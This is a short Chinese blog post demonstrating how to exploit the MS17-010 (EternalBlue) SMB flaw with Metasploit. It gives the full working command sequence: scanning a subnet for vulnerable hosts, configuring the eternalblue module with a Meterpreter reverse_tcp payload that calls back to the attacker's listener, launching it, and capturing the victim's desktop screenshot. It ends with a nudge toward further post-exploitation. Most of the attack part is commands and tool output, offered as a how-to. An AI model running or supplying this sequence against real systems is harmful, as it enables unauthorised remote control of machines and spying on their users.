使用MSF對MS17-010的利用演示
阿新 • • 發佈:2018-03-27
MSF kali ms17-010 過程:
1、掃描: 信息搜集(刺探)
2、漏洞利用
一、首先檢測網段內存在漏洞的主機系統:
使用命令:
msf > use auxiliary/scanner/smb/smb_ms17_010 //加載掃描exp msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24 //配置掃描網段 msf auxiliary(scanner/smb/smb_ms17_010) > run //進行掃描
結果如下:
二、漏洞利用
msf利用命令如下:
msf > use exploit/windows/smb/ms17_010_eternalblue //加載攻擊模塊 msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 //配置攻擊目標IP RHOSTS => 192.168.22.25 msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 //配置本機IP LHOST => 192.168.5.146 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //配置回鏈方式 payload => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) >
查看當前配置的payload
msf exploit(windows/smb/ms17_010_eternalblue) > show options //查看配置選項 Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.22.25 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.5.146 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(windows/smb/ms17_010_eternalblue) >
發起攻擊:
攻擊命令: msf exploit(windows/smb/ms17_010_eternalblue) > exploit //發起攻擊
獲取對方電腦桌面:
meterpreter > screenshot Screenshot saved to: /root/RBDEvfGv.jpeg //可以到root目錄下 查看對方電腦的截屏
獲取shel權限
有關更多獲取權限後的攻擊技巧, 請自行百度 msf 後滲透 攻擊模塊
使用MSF對MS17-010的利用演示